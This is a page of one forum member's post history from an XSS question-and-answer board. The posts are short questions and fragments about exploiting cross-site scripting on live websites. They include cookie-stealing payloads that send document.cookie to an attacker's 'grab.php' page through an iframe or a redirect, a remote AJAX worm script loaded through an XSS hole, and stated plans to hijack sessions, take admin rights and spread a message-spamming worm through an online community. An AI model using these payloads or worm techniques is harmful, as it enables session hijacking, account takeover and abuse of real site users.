Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 43
3 years ago
Ryonan
Hello everyone, Recently i found a website that come with an XSS, but the problem is when i try to run the page in a iframe, it's not possible because it has these script in its source. ########## <SCRIPT> if (top.location != self.location) { top.location = self.location; } window.focus(); </SCRIPT> ################ And now i think of loadi
Forum: XSS Info
4 years ago
Ryonan
XSS in vBulletin ? i dont think if this is possible.
Forum: XSS Info
4 years ago
Ryonan
What's that language ? Eskimor ??
Forum: XSS Info
4 years ago
Ryonan
lol, somebody can explain about it ?
Forum: XSS Info
4 years ago
Ryonan
as long as you have the frame in the XSS page, you can read its contents.
Forum: XSS Info
4 years ago
Ryonan
Hello, i stole cookie of a user, but i can't login right away with : javascript:document.cookie="user=1;password=434rerdsd343;" instead, i have to enter one by one, first with user, and then with password to login.
Forum: XSS Info
4 years ago
Ryonan
hahaha, that's incredible .... i dont know if some1 need this but if you change the inner HTML of any object on the victim's site into a frame, you will need a little time to wait for the frame's loading. and then you can read the content of that frame. And here is the simple script : ################################################ setTimeout('alert(document.frames["hello"].document
Forum: XSS Info
4 years ago
Ryonan
Yes, i know you guy talked about this in some older thread, i did try but it doesn't work. Here is my case : i use XSS to change a text into a frame ( by innerHTML ), and then try to read the content of that frame. but it's seem hopeless. what i try : alert(parent.document.frames['new_frame'].body.innerHTML); thanks for your help!
Forum: XSS Info
4 years ago
Ryonan
thank you guy for link but they doesn't work. weird !
Forum: XSS Info
4 years ago
Ryonan
Hi, i recently know a site that need the check box to be checked to do the AJAX request, but i dont know how to do this, here is what i try : &check=checked &checked=1 #checked=true but none of them work. Thanks
Forum: XSS Info
4 years ago
Ryonan
haha, that's a very kind explanation. thax you sidircat
Forum: XSS Info
4 years ago
Ryonan
Oh my god, i can't believe it ! you save my day .... but will your kindly explain me why would we escape the cookie to receive it all ? thanks alot.
Forum: XSS Info
4 years ago
Ryonan
Hello, i recently found an XSS bug and i don't want to make any phishings or fake login. i did change the innerHTML of an div tag on the site into a frame like to my cookie logger like this : <iframe src=http://my-site.com/index.php?record=+parent.document.cookie> but what i receive is only the PHP session (PHPSESSID=blah blah) i will receive all the cookie when i do : document.location=
Forum: XSS Info
4 years ago
Ryonan
searching a while, the final solution is the same as my prediction. thanks anyway
Forum: XSS Info
4 years ago
Ryonan
Hello, i found an xss hole on a site, they do nothing to prevent but UPPERCASE all the input character, so javascript won't even work. i can put a frame on it but i don't know if there is a way to by pass this ?
Forum: XSS Info
4 years ago
Ryonan
i think there is no way to do so
Forum: XSS Info
4 years ago
Ryonan
nice job Ron :d. i made something similar like that months ago, victim is aN online community, but they seem dont care much about the worm.
Forum: XSS Info
4 years ago
Ryonan
you can use something like this : '<iframe src=http://my-site.com/grab.php?s='+parent.document.cookie+'>'; another solution, that works for me : document.location="http://my-site.com/grab.php?s=document.cookie; in your grab page, after writting the cookie, place this code : document.location="http://victim-site.com" the browser will make this fast enough so they can hard
Forum: XSS Info
4 years ago
Ryonan
Hello, i've found an XSS on a well-known site, the XSS is in the index page which has nothing to do with infection but there is a forum on an add-on domain like this : index page : http://site.com/s=XSS forum : http://site.com/forum my question is : can i use XSS to ask the user post some topics in the forum, i think the post request in ajax will be somethings like : ####################
Forum: XSS Info
5 years ago
Ryonan
i am not sure but some of your questions can be answer by searching on this forum or with google. one for sure that XSS is extremely dangerous. the moderm XSS is the shakehands between classic XSS and AJAX, and CRSF maybe.
Forum: XSS Info
5 years ago
Ryonan
yes, that's a bad news, i did see dozen of sites keep me out from using XSS only with quote encoded.
Forum: XSS Info
5 years ago
Ryonan
no, i can't access the page with fake cookie. they must have use the session to prevent that, but just can't give up with an XSS like that. i have a question that does AJAX work on subdomain ? i have a XSS bug at a.site.com, will the script executed at b.site.com and must i specific the URL ? thanks
Forum: XSS Info
5 years ago
Ryonan
hello, i've just found an XSS hole on a great site and trying to steal the user's cookie. but i can't put my own cookie after logging out to log in again, the site has a SSL, i think it's the poin, here is the cookie : ###################################################### PHPSESSID=nohr046i2ngj4fcggck3irqfc0; __utmc=95862039; __utma=95862039.744283387.1252155967.1252155967.1252155967.1;
Forum: XSS Info
5 years ago
Ryonan
PaPPy, you've just trained me an attacker. actually, i found an online community with very serious XSS hole, allow me to take their admin right ( my previous topic ).i tried to inform them but they do very little to fix it, and now with the new hole, i'll have an XSS worm there. with power of AJAX, my worm will change the user's display name, their status text, auto and non-stop sending message t
Forum: XSS Info
5 years ago
Ryonan
thanks pappy,barbarianbob for your reply. there is a small question left ... that's how can i have many POST request in a same AJAX scipt ? searching around and google said that i must create request as much as i want to send. thx
Forum: XSS Info
5 years ago
Ryonan
thanks for your reply. from your post i see we can use AJAX in a remote javascript file which is stored on another server, right ? and can you help me a bit here : ######################### ajaxRequest.onreadystatechange = function(){ if(ajaxRequest.readyState == 4){ alert("ok"); // THIS ALERT BOX CANNOT BE FIRED SO I GUESS THE PROBLEM IS THE CONNECTION CANNOT BE ESTABLISHED /
Forum: XSS Info
5 years ago
Ryonan
hello, i wonder if the AJAX can run from an another server, i mean if i have #################################################################### http://site1.com/AJAX.js , can it run throught an XSS hole in http://site2.com/?XSS=<script src="http://site1.com/AJAX.js"></script> #################################################################### Thanks.
Forum: XSS Info
5 years ago
Ryonan
thanks for reply, but it's still hard to figure this out. here is my AJAX code, it just tries to send a post request to the server in order to leave a message : ################################ <body onLoad="ajax()"> <script> function ajax(){ alert(1); var ajaxRequest; // The variable that makes Ajax possible! try{ // Opera 8.0+, Firefox, Safari ajaxReq
Forum: XSS Info
5 years ago
Ryonan
hello, i've just read a Pappy's document here : http://docs.google.com/Doc?id=df6vnh4w_10fdwpg8ff. it's really great but i have a question, that can i use <script src=http://mysite.com/AJAX-WORM.js> throught XSS hole ? or must i put a iframe which contain that script ? thanks.
Forum: XSS Info
5 years ago
Ryonan
yes. i still wonder why. maybe they use some javascript in the index page to protect their cookie from being written. i'll check that again.
Forum: XSS Info
Pages: 12Next
Current Page: 1 of 2